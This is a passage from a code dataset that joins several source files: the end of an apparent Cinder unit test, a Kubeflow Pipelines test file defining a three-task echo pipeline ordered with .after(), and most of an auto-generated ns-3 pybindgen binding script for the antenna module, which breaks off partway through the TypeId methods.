"SELECT provider_location FROM volumes WHERE id='fake_vol_id';")
self.assertRaises(Exception,
self.cinder_client.get_volume_path_iscsi,
'fake_vol_id')
| apache-2.0 |
kubeflow/pipelines | sdk/python/kfp/v2/compiler_cli_tests/test_data/pipeline_with_after.py | 1 | 1319 | # Copyright 2020 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kfp import components
from kfp.v2 import dsl
import kfp.v2.compiler as compiler
component_op = components.load_component_from_text("""
name: Print Text
inputs:
- {name: text, type: String}
implementation:
container:
image: alpine
command:
- sh
- -c
- |
set -e -x
echo "$0"
- {inputValue: text}
""")
@dsl.pipeline(name='pipeline-with-after', pipeline_root='dummy_root')
def my_pipeline():
task1 = component_op(text='1st task')
task2 = component_op(text='2nd task').after(task1)
task3 = component_op(text='3rd task').after(task1, task2)
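# .after() declares ordering-only dependencies: task2 starts once task1
# finishes, and task3 waits for both, even though no data is exchanged.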
if __name__ == '__main__':
compiler.Compiler().compile(
pipeline_func=my_pipeline,
package_path=__file__.replace('.py', '.json'))
| apache-2.0 |
cyc805/FR_Comparison_LRD | src/antenna/bindings/modulegen__gcc_LP64.py | 14 | 89068 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
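# Returning True from handle_error() above tells pybindgen the error was
# handled, so a failing wrapper is skipped with a warning instead of
# aborting the whole generation run.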
import sys
def module_init():
root_module = Module('ns.antenna', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## angles.h (module 'antenna'): ns3::Angles [struct]
module.add_class('Angles')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## hash.h (module 'core'): ns3::Hasher [class]
module.add_class('Hasher', import_from_module='ns.core')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## antenna-model.h (module 'antenna'): ns3::AntennaModel [class]
module.add_class('AntennaModel', parent=root_module['ns3::Object'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## cosine-antenna-model.h (module 'antenna'): ns3::CosineAntennaModel [class]
module.add_class('CosineAntennaModel', parent=root_module['ns3::AntennaModel'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## isotropic-antenna-model.h (module 'antenna'): ns3::IsotropicAntennaModel [class]
module.add_class('IsotropicAntennaModel', parent=root_module['ns3::AntennaModel'])
## parabolic-antenna-model.h (module 'antenna'): ns3::ParabolicAntennaModel [class]
module.add_class('ParabolicAntennaModel', parent=root_module['ns3::AntennaModel'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace Hash
nested_module = module.add_cpp_namespace('Hash')
register_types_ns3_Hash(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_Hash(module):
root_module = module.get_root()
## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash32Function_ptr')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash32Function_ptr*')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash32Function_ptr&')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash64Function_ptr')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash64Function_ptr*')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash64Function_ptr&')
## Register a nested module for the namespace Function
nested_module = module.add_cpp_namespace('Function')
register_types_ns3_Hash_Function(nested_module)
def register_types_ns3_Hash_Function(module):
root_module = module.get_root()
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_methods(root_module):
register_Ns3Angles_methods(root_module, root_module['ns3::Angles'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AntennaModel_methods(root_module, root_module['ns3::AntennaModel'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3CosineAntennaModel_methods(root_module, root_module['ns3::CosineAntennaModel'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3IsotropicAntennaModel_methods(root_module, root_module['ns3::IsotropicAntennaModel'])
register_Ns3ParabolicAntennaModel_methods(root_module, root_module['ns3::ParabolicAntennaModel'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
return
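# Each register_Ns3*_methods function below follows the same pybindgen
# pattern: it is handed the root module registry plus the CppClass wrapper
# for a single C++ type and attaches that type's constructors, methods,
# operators and instance attributes. The '##' comments record the scanned
# C++ declaration and the header it came from.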
def register_Ns3Angles_methods(root_module, cls):
cls.add_output_stream_operator()
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Angles const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Angles const &', 'arg0')])
## angles.h (module 'antenna'): ns3::Angles::Angles() [constructor]
cls.add_constructor([])
## angles.h (module 'antenna'): ns3::Angles::Angles(double phi, double theta) [constructor]
cls.add_constructor([param('double', 'phi'), param('double', 'theta')])
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Vector v) [constructor]
cls.add_constructor([param('ns3::Vector', 'v')])
## angles.h (module 'antenna'): ns3::Angles::Angles(ns3::Vector v, ns3::Vector o) [constructor]
cls.add_constructor([param('ns3::Vector', 'v'), param('ns3::Vector', 'o')])
## angles.h (module 'antenna'): ns3::Angles::phi [variable]
cls.add_instance_attribute('phi', 'double', is_const=False)
## angles.h (module 'antenna'): ns3::Angles::theta [variable]
cls.add_instance_attribute('theta', 'double', is_const=False)
return
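# Sketch of how the Angles binding is used once the module is compiled
# (assumes it is importable as ns.antenna; both angles are in radians):
#
#   import ns.antenna
#   a = ns.antenna.Angles(0.0, 1.57)  # phi, theta
#   a.phi, a.theta                    # exposed as plain double attributes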
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3Hasher_methods(root_module, cls):
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
cls.add_constructor([])
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('std::string const', 's')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('std::string const', 's')])
## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
cls.add_method('clear',
'ns3::Hasher &',
[])
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
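# The Get/SetAttribute pair bound above is the generic attribute entry
# point for every ns-3 object. A hypothetical use from Python, assuming
# the core bindings are available as ns.core:
#
#   v = ns.core.DoubleValue()
#   obj.GetAttribute('Beamwidth', v)              # fills v in place
#   obj.SetAttribute('Beamwidth', ns.core.DoubleValue(60.0))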
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
